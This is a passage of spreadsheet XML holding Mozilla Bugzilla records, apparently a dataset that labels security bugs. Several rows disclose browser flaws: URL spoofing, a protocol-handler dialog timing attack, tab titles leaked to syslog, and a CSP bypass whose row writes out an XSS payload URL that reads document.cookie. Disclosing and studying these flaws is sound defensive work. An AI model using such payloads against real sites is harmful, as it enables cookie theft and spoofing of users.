          <t>Core</t>
        </is>
      </c>
      <c r="J4447" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K4447" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4447" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4447" t="inlineStr">
        <is>
          <t>Windows 95</t>
        </is>
      </c>
      <c r="N4447" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4447" t="inlineStr">
        <is>
          <t>[PDT+]</t>
        </is>
      </c>
      <c r="Q4447" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4447" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4447" t="inlineStr">
        <is>
          <t>M14</t>
        </is>
      </c>
      <c r="T4447" t="n">
        <v>1</v>
      </c>
      <c r="U4447" t="n">
        <v>0</v>
      </c>
      <c r="V4447" t="n">
        <v>12</v>
      </c>
      <c r="W4447" t="inlineStr">
        <is>
          <t>Just having window.open in body is crashing application.
BUILDS: 02-08-09.
STEPS TO REPRODUCE:
1] Please load attachment I'm going to provide.
OR
1] Please copy HTML code I'm providing. Save it as HTML file.
2] Open this HTMl file with above specified builds.
EXPECTED RESULTS:
Should open new window with URL http://www.yahoo.com
ACTUAL RESULTS:
Application crashes.
TESTCASE CODE START:
&lt;HTML&gt;
&lt;HEAD&gt;&lt;TITLE&gt;Window.Open()&lt;/TITLE&gt;&lt;/HEAD&gt;
&lt;BODY&gt;
This page will open new Window.
&lt;SCRIPT&gt;
&lt;!--
    url = 'http://www.yahoo.com';
    testWin = window.open(url, 'testWindow');
//--&gt;
&lt;/SCRIPT&gt;
&lt;/BODY&gt;
&lt;/HTML&gt;
TESTCASE CODE END:</t>
        </is>
      </c>
      <c r="X4447" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4448">
      <c r="A4448" t="n">
        <v>1527717</v>
      </c>
      <c r="B4448" t="inlineStr">
        <is>
          <t>2019-02-13 12:21:33 -0800</t>
        </is>
      </c>
      <c r="C4448" t="inlineStr">
        <is>
          <t>Windows programs that aren't "URL Handlers" exposed to web content</t>
        </is>
      </c>
      <c r="D4448" t="inlineStr">
        <is>
          <t>2019-08-07 17:25:25 -0700</t>
        </is>
      </c>
      <c r="E4448" t="n">
        <v>1</v>
      </c>
      <c r="F4448" t="n">
        <v>1</v>
      </c>
      <c r="G4448" t="n">
        <v>2</v>
      </c>
      <c r="H4448" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4448" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4448" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K4448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4448" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N4448" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4448" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q4448" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4448" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4448" t="inlineStr">
        <is>
          <t>Firefox 67</t>
        </is>
      </c>
      <c r="T4448" t="n">
        <v>1</v>
      </c>
      <c r="U4448" t="n">
        <v>0</v>
      </c>
      <c r="V4448" t="n">
        <v>22</v>
      </c>
      <c r="W4448" t="inlineStr">
        <is>
          <t>On Windows Firefox will accept any registered ProgID as an external protocol scheme and offer to launch the local application if given such a URL. Unless a program has specifically advertised itself as a "URL Handler" (and presumably addressed the security implications of remote untrusted content) we should NOT offer to launch them.
For an example see https://crbug.com/889459 where a python.file: URL was used as a key part of a remote execution bug (with user interaction). IE/Edge, meanwhile, safely ignore python.file: (and a zillion others) because they're checking for the presence of the URL Handler key.
We'd want to do a similar check probably in
https://searchfox.org/mozilla-central/source/uriloader/exthandler/win/nsOSHelperAppService.cpp#72</t>
        </is>
      </c>
      <c r="X4448" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4449">
      <c r="A4449" t="n">
        <v>1344091</v>
      </c>
      <c r="B4449" t="inlineStr">
        <is>
          <t>2017-03-02 18:07:39 -0800</t>
        </is>
      </c>
      <c r="C4449" t="inlineStr">
        <is>
          <t>Reorganize the header and modules on modal bug UI</t>
        </is>
      </c>
      <c r="D4449" t="inlineStr">
        <is>
          <t>2019-10-15 15:58:11 -0700</t>
        </is>
      </c>
      <c r="E4449" t="n">
        <v>1</v>
      </c>
      <c r="F4449" t="n">
        <v>1</v>
      </c>
      <c r="G4449" t="n">
        <v>7</v>
      </c>
      <c r="H4449" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4449" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J4449" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K4449" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L4449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4449" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4449" t="inlineStr">
        <is>
          <t>[modal-enhancements]</t>
        </is>
      </c>
      <c r="Q4449" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4449" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4449" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4449" t="n">
        <v>1</v>
      </c>
      <c r="U4449" t="n">
        <v>0</v>
      </c>
      <c r="V4449" t="n">
        <v>36</v>
      </c>
      <c r="W4449" t="inlineStr">
        <is>
          <t>Move 'See Also' into the tracking section since it is related to 'Depends on' and 'Blocks'</t>
        </is>
      </c>
      <c r="X4449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4450">
      <c r="A4450" t="n">
        <v>1849186</v>
      </c>
      <c r="B4450" t="inlineStr">
        <is>
          <t>2023-08-17 09:22:55 -0700</t>
        </is>
      </c>
      <c r="C4450" t="inlineStr">
        <is>
          <t>Browsing history leaked to syslogs via GNOME</t>
        </is>
      </c>
      <c r="D4450" t="inlineStr">
        <is>
          <t>2024-06-02 11:57:16 -0700</t>
        </is>
      </c>
      <c r="E4450" t="n">
        <v>1</v>
      </c>
      <c r="F4450" t="n">
        <v>1</v>
      </c>
      <c r="G4450" t="n">
        <v>2</v>
      </c>
      <c r="H4450" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4450" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4450" t="inlineStr">
        <is>
          <t>Private Browsing</t>
        </is>
      </c>
      <c r="K4450" t="inlineStr">
        <is>
          <t>Firefox 102</t>
        </is>
      </c>
      <c r="L4450" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M4450" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4450" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4450" t="inlineStr">
        <is>
          <t>[adv-main121+]</t>
        </is>
      </c>
      <c r="Q4450" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4450" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S4450" t="inlineStr">
        <is>
          <t>121 Branch</t>
        </is>
      </c>
      <c r="T4450" t="n">
        <v>1</v>
      </c>
      <c r="U4450" t="n">
        <v>0</v>
      </c>
      <c r="V4450" t="n">
        <v>13</v>
      </c>
      <c r="W4450" t="inlineStr">
        <is>
          <t>Tor Browser devs have received this bug report from user @honorton:
&gt; ### Summary
&gt; Tab titles are sometimes logged by GNOME to `/var/log/syslog`, effectively causing browsing habits to persist on the system, even after closing Tor Browser. As Tor Browser does not save history by default, many users will not expect this.
&gt; 
&gt; ### Steps to reproduce:
&gt; 1. Open a new Tor Browser window.
&gt; 2. (optional) "Connect" to the Tor network and navigate to an arbitrary website.
&gt; 3. Press the Super key (default) to open the GNOME activities menu.
&gt; 4. Review syslog via `cat /var/log/syslog | grep -i "browser"`
&gt; 
&gt; ### What is the current bug behavior?
&gt; I see results containing Tor Browser tab titles, such as the titles of opened websites.
&gt; 
&gt; ### What is the expected behavior?
&gt; I expect not to see my visited website titles in any system file without my authorization.
&gt; 
&gt; More strongly, I don't expect GNOME (which may log all sorts of things) to require access to my visited website titles.
&gt; 
&gt; ### Environment
&gt; - OS Version: Pop! OS 22.04
&gt; - GNOME Shell Version: 3.38.6
&gt; - Tor Browser Version: 12.5.2
&gt; - Tor Browser Installation Method: "Linux" binary from `https://www.torproject.org/download/`
&gt; 
&gt; ### Relevant logs and/or screenshots
&gt; 
&gt; ```
&gt; [/var/log/syslog]
&gt; [snip]
&gt; Aug  9 11:23:52 pop-os gnome-shell[2864]: Couldn't find child [0x5558d69f7880 Gjs_ui_windowPreview_WindowPreview ("cute cats at DuckDuckGo — Tor Browser")] in window slots
&gt; Aug  9 11:23:53 pop-os gnome-shell[2864]: Couldn't find child [0x5558d69f7880 Gjs_ui_windowPreview_WindowPreview:first-child last-child ("cute cats at DuckDuckGo — Tor Browser")] in window slots
&gt; Aug  9 11:27:28 pop-os gnome-shell[2864]: Couldn't find child [0x5558da9ea870 Gjs_ui_windowPreview_WindowPreview:first-child last-child ("[Wayland] [3.38.3] Shell freezes/stops reacting to most input (#3706) · Issues · GNOME / gnome-shell · GitLab — Tor Browser")] in window slots
&gt; Aug  9 11:27:31 pop-os gnome-shell[2864]: Couldn't find child [0x5558da9ea870 Gjs_ui_windowPreview_WindowPreview:first-child last-child ("[Wayland] [3.38.3] Shell freezes/stops reacting to most input (#3706) · Issues · GNOME / gnome-shell · GitLab — Tor Browser")] in window slots
&gt; [snip]
&gt; ```
Our best idea so far would gate setting the window title to the webpage title behind private browsing mode.</t>
        </is>
      </c>
      <c r="X4450" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4451">
      <c r="A4451" t="n">
        <v>724353</v>
      </c>
      <c r="B4451" t="inlineStr">
        <is>
          <t>2012-02-05 02:35:38 -0800</t>
        </is>
      </c>
      <c r="C4451" t="inlineStr">
        <is>
          <t>protocol handler dialog does not resist ui timing attacks</t>
        </is>
      </c>
      <c r="D4451" t="inlineStr">
        <is>
          <t>2016-07-02 11:29:52 -0700</t>
        </is>
      </c>
      <c r="E4451" t="n">
        <v>1</v>
      </c>
      <c r="F4451" t="n">
        <v>1</v>
      </c>
      <c r="G4451" t="n">
        <v>3</v>
      </c>
      <c r="H4451" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4451" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4451" t="inlineStr">
        <is>
          <t>UI Widgets</t>
        </is>
      </c>
      <c r="K4451" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4451" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4451" t="inlineStr">
        <is>
          <t>[sg:moderate][adv-main44+]</t>
        </is>
      </c>
      <c r="Q4451" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4451" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4451" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T4451" t="n">
        <v>1</v>
      </c>
      <c r="U4451" t="n">
        <v>0</v>
      </c>
      <c r="V4451" t="n">
        <v>15</v>
      </c>
      <c r="W4451" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.3 Safari/535.19
Steps to reproduce:
&lt;a href="telnet://127.0.0.1" style="postion:somewhere"&gt;Double-clicking me&lt;/a&gt;
http://www.opera.com/support/kb/view/823/
Links in Web pages only require a single click. When a user double-clicks on a Web link, that action is taken as two separate clicks: One to follow the link, and the other to any dialog that might appear where the link was.
you did not do the url-handle UI same as download UI
Actual results:
telnet: is allowed
Expected results:
disabled the button for seconds</t>
        </is>
      </c>
      <c r="X4451" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4452">
      <c r="A4452" t="n">
        <v>514232</v>
      </c>
      <c r="B4452" t="inlineStr">
        <is>
          <t>2009-09-02 10:52:14 -0700</t>
        </is>
      </c>
      <c r="C4452" t="inlineStr">
        <is>
          <t>URL spoofing bug involving Firefox's error pages, document.location</t>
        </is>
      </c>
      <c r="D4452" t="inlineStr">
        <is>
          <t>2020-10-26 02:07:53 -0700</t>
        </is>
      </c>
      <c r="E4452" t="n">
        <v>1</v>
      </c>
      <c r="F4452" t="n">
        <v>1</v>
      </c>
      <c r="G4452" t="n">
        <v>3</v>
      </c>
      <c r="H4452" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4452" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4452" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K4452" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4452" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4452" t="inlineStr">
        <is>
          <t>Windows Vista</t>
        </is>
      </c>
      <c r="N4452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4452" t="inlineStr">
        <is>
          <t xml:space="preserve">[sg:moderate] spoof </t>
        </is>
      </c>
      <c r="Q4452" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4452" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4452" t="inlineStr">
        <is>
          <t>mozilla1.9.2</t>
        </is>
      </c>
      <c r="T4452" t="n">
        <v>1</v>
      </c>
      <c r="U4452" t="n">
        <v>0</v>
      </c>
      <c r="V4452" t="n">
        <v>49</v>
      </c>
      <c r="W4452" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
This vulnerability is similare to http://www.mozilla.org/security/announce/2009/mfsa2009-44.html
The problem originated is from the creation of a link with javascript (window.open &amp; document.location) . When you enter an incorrect address seems that the firefox can't
translate to address web and display it in blank page.
This blank page can be changed with javascript with making a spoofing attak.
Reproducible: Always
Steps to Reproduce:
Steps to Reproduce :
Step 1=&gt; Create an html file with a special javascript or open http://www.seeon.fr/blog/public/spoofurl.html
Step 2=&gt;Open the page
Actual Results:  
One can visualize the address unresolved and the fake page.
similary to http://www.mozilla.org/security/announce/2009/mfsa2009-44.html the problem is that with javascript window can be changed by altering the content and halting the loading of the page.
Function Javascript used :
window.open
window.stop
document.write
document.location</t>
        </is>
      </c>
      <c r="X4452" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4453">
      <c r="A4453" t="n">
        <v>932388</v>
      </c>
      <c r="B4453" t="inlineStr">
        <is>
          <t>2013-10-29 10:36:45 -0700</t>
        </is>
      </c>
      <c r="C4453" t="inlineStr">
        <is>
          <t>[1.3] Music App launch time improvements</t>
        </is>
      </c>
      <c r="D4453" t="inlineStr">
        <is>
          <t>2013-11-19 23:23:00 -0800</t>
        </is>
      </c>
      <c r="E4453" t="n">
        <v>1</v>
      </c>
      <c r="F4453" t="n">
        <v>1</v>
      </c>
      <c r="G4453" t="n">
        <v>6</v>
      </c>
      <c r="H4453" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4453" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J4453" t="inlineStr">
        <is>
          <t>Gaia::Music</t>
        </is>
      </c>
      <c r="K4453" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4453" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M4453" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N4453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4453" t="inlineStr">
        <is>
          <t xml:space="preserve">[c=progress p=4 s= u=1.3] </t>
        </is>
      </c>
      <c r="Q4453" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4453" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4453" t="inlineStr">
        <is>
          <t>1.3 Sprint 4 - 11/8</t>
        </is>
      </c>
      <c r="T4453" t="n">
        <v>1</v>
      </c>
      <c r="U4453" t="n">
        <v>0</v>
      </c>
      <c r="V4453" t="n">
        <v>10</v>
      </c>
      <c r="W4453" t="inlineStr">
        <is>
          <t>Music app launch time improvements tracking bug.</t>
        </is>
      </c>
      <c r="X4453" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4454">
      <c r="A4454" t="n">
        <v>566141</v>
      </c>
      <c r="B4454" t="inlineStr">
        <is>
          <t>2010-05-15 10:02:13 -0700</t>
        </is>
      </c>
      <c r="C4454" t="inlineStr">
        <is>
          <t>GC hazard in MarkSharpObjects</t>
        </is>
      </c>
      <c r="D4454" t="inlineStr">
        <is>
          <t>2010-10-30 18:13:57 -0700</t>
        </is>
      </c>
      <c r="E4454" t="n">
        <v>1</v>
      </c>
      <c r="F4454" t="n">
        <v>1</v>
      </c>
      <c r="G4454" t="n">
        <v>3</v>
      </c>
      <c r="H4454" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4454" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4454" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4454" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L4454" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4454" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4454" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4454" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4454" t="inlineStr">
        <is>
          <t>[sg:critical][critsmash:investigating] fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4454" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4454" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4454" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4454" t="n">
        <v>1</v>
      </c>
      <c r="U4454" t="n">
        <v>0</v>
      </c>
      <c r="V4454" t="n">
        <v>34</v>
      </c>
      <c r="W4454" t="inlineStr">
        <is>
          <t>Consider the following code in MarkSharpObject, http://hg.mozilla.org/tracemonkey/file/818656d6f1e4/js/src/jsobj.cpp#l276 :
            ok = obj-&gt;lookupProperty(cx, id, &amp;obj2, &amp;prop);
...
            ok = obj2-&gt;getAttributes(cx, id, prop, &amp;attrs);
            if (ok) {
                if (obj2-&gt;isNative() &amp;&amp;
                    (attrs &amp; (JSPROP_GETTER | JSPROP_SETTER))) {
                    JSScopeProperty *sprop = (JSScopeProperty *) prop;
                    val = JSVAL_VOID;
                    if (attrs &amp; JSPROP_GETTER)
                        val = sprop-&gt;getterValue();
                    if (attrs &amp; JSPROP_SETTER) {
                        if (val != JSVAL_VOID) {
                            /* Mark the getter, then set val to setter. */
                            ok = (MarkSharpObjects(cx, JSVAL_TO_OBJECT(val),
                                                   NULL)
                                  != NULL);
                        }
...
            }
            obj2-&gt;dropProperty(cx, prop);
This code has a bug as it can start a long-running operation between lookupProperty and dropProperty calls due to a recursion in MarkSharpObjects. Without the proposed changes from the bug 546590 this can only hurt embeddings that share objects between threads as it may nests locks itc. For the browser this is harmless as lookupProperty/getAttributes at worst can run a resolve hook and their implementation in the browser do not run arbitrary code.
But proxies chnage that. Now lookupProperty can run an arbitrary script. Thus if MarkSharpObjects for the setter discovers a proxy, it could run a script that can delete the property under lookup and its scope. That would lead to a hazard.</t>
        </is>
      </c>
      <c r="X4454" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4455">
      <c r="A4455" t="n">
        <v>1587976</v>
      </c>
      <c r="B4455" t="inlineStr">
        <is>
          <t>2019-10-10 16:23:28 -0700</t>
        </is>
      </c>
      <c r="C4455" t="inlineStr">
        <is>
          <t>CSP script-src 'none'; allows &lt;object&gt; to execute javascript code in firefox (but firefox developer edition works fines)</t>
        </is>
      </c>
      <c r="D4455" t="inlineStr">
        <is>
          <t>2024-05-30 10:03:39 -0700</t>
        </is>
      </c>
      <c r="E4455" t="n">
        <v>1</v>
      </c>
      <c r="F4455" t="n">
        <v>1</v>
      </c>
      <c r="G4455" t="n">
        <v>3</v>
      </c>
      <c r="H4455" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4455" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4455" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4455" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4455" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4455" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4455" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4455" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4455" t="inlineStr">
        <is>
          <t>[fixed by bug 1555043][reporter-external] [client-bounty-form] [verif?][adv-main70+]</t>
        </is>
      </c>
      <c r="Q4455" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4455" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4455" t="inlineStr">
        <is>
          <t>mozilla71</t>
        </is>
      </c>
      <c r="T4455" t="n">
        <v>1</v>
      </c>
      <c r="U4455" t="n">
        <v>0</v>
      </c>
      <c r="V4455" t="n">
        <v>9</v>
      </c>
      <c r="W4455" t="inlineStr">
        <is>
          <t>Created attachment 9100338
report.zip
The Mozilla developer docs say that:
"The HTTP Content-Security-Policy (CSP) script-src directive specifies valid sources for JavaScript. This includes not only URLs loaded directly into &lt;script&gt; elements, but also things like inline script event handlers (onclick) and XSLT stylesheets which can trigger script execution."
and: 
"'none'   Refers to the empty set; that is, no URLs match. The single quotes are required.", according to https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/script-src
These days while I was playing a CTF, I was able to trigger arbitrary javascript in the page's context using the &lt;object&gt; tag and could even steal user cookies.  
This wasn't the CTF expected solution and shouldn't have worked because of the script-src 'none' policy ( doesn't work on chrome and other browsers).
So I made a PoC page and the working payload is: http://38.240.18.75/csp/index.php?payload=&lt;object data="javascript:alert(`${document.cookie}`)"&gt;&lt;/object&gt;
Code like: http://38.240.18.75/csp/index.php?payload=&lt;object data="data:text/html,&lt;script&gt;alert(document.cookie)&lt;/script&gt;"&gt;&lt;/object&gt; 
executes in a different context and doesn't affect the web page, but maybe should be blocked as well by the CSP policy. In the attachments I'm disposing the webpage source and some prints of a working PoC.</t>
        </is>
      </c>
      <c r="X4455" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4456">
      <c r="A4456" t="n">
        <v>528134</v>
      </c>
      <c r="B4456" t="inlineStr">
        <is>
          <t>2009-11-11 21:01:16 -0800</t>
        </is>
      </c>
      <c r="C4456" t="inlineStr">
        <is>
          <t>inDOMUtils::GetRuleNodeForContent can hand back a dead rulenode</t>
        </is>
      </c>
      <c r="D4456" t="inlineStr">
        <is>
          <t>2010-05-09 16:25:45 -0700</t>
        </is>
      </c>
      <c r="E4456" t="n">
        <v>1</v>
      </c>
      <c r="F4456" t="n">
        <v>1</v>
      </c>
      <c r="G4456" t="n">
        <v>3</v>
      </c>
      <c r="H4456" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4456" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4456" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K4456" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4456" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4456" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4456" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4456" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4456" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4456" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4456" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4456" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4456" t="n">
        <v>1</v>
      </c>
      <c r="U4456" t="n">
        <v>0</v>
      </c>
      <c r="V4456" t="n">
        <v>19</v>
      </c>
      <c r="W4456" t="inlineStr">
        <is>
          <t>See bug 527567 comment 5.</t>
        </is>
      </c>
      <c r="X4456" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4457">
      <c r="A4457" t="n">
        <v>1227052</v>
      </c>
      <c r="B4457" t="inlineStr">
        <is>
          <t>2015-11-23 01:22:28 -0800</t>
        </is>
      </c>
      <c r="C4457" t="inlineStr">
        <is>
          <t>stagefright delete array</t>
        </is>
      </c>
      <c r="D4457" t="inlineStr">
        <is>
          <t>2024-05-30 09:07:15 -0700</t>
        </is>
      </c>
      <c r="E4457" t="n">
        <v>1</v>
      </c>
      <c r="F4457" t="n">
        <v>1</v>
      </c>
      <c r="G4457" t="n">
        <v>3</v>
      </c>
      <c r="H4457" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4457" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4457" t="inlineStr">
        <is>
          <t>Audio/Video: Playback</t>
        </is>
      </c>
      <c r="K4457" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4457" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4457" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4457" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4457" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main45+]</t>
        </is>
      </c>
      <c r="Q4457" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4457" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4457" t="inlineStr">
        <is>
          <t>mozilla45</t>
        </is>
      </c>
      <c r="T4457" t="n">
        <v>0</v>
      </c>
      <c r="U4457" t="n">
        <v>0</v>
      </c>
      <c r="V4457" t="n">
        <v>17</v>
      </c>
      <c r="W4457" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Steps to reproduce:
array creation
http://hg.mozilla.org/mozilla-central/file/tip/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l689
element destruction (should be array destruction, delete[] instead of delete)
http://hg.mozilla.org/mozilla-central/file/tip/media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp#l405
Actual results:
crash
Expected results:
correct destruction of array</t>
        </is>
      </c>
      <c r="X4457" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4458">
      <c r="A4458" t="n">
        <v>1739934</v>
      </c>
      <c r="B4458" t="inlineStr">
        <is>
          <t>2021-11-07 20:54:20 -0800</t>
        </is>
      </c>
      <c r="C4458" t="inlineStr">
        <is>
